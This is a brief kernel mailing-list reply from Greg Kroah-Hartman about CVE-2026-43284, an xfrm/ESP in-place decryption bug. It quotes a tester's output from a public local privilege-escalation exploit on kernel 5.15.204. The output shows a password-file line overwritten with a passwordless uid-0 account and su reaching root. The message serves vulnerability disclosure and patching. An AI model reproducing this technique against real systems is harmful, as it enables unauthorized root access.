Re: CVE-2026-43284: xfrm: esp: avoid in-place decrypt on shared skb frags

From: Greg Kroah-Hartman

Date: Fri May 08 2026 - 06:12:43 EST


On Fri, May 08, 2026 at 10:57:05AM +0200, Massimiliano Pellizzer wrote:
> On Fri, May 8, 2026 at 9:24 AM Greg Kroah-Hartman
> I tested the publicly available exploit against the stable kernel 5.15.204.
> That stable branch is affected too.
>
> ```
> $ ./run.sh
> === Stage 1 — overwrite 'systemd-timesync' line (89 bytes) with
> 'sick::0:0:<pad>:/:/bin/bash'
> === Stage 2 — verify
> sick::0:0:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:/:/bin/bash
> === Stage 3 — su - sick (empty password via PAM nullok)
> [i] state saved to /var/tmp/.cf2.state — run './run.sh --clean' to revert
> # whoami
> root
> # uname -r
> 5.15.204
> ```
>

Yes, patches for that are being worked on right now; give me a chance to
get some lunch :)

thanks,

greg k-h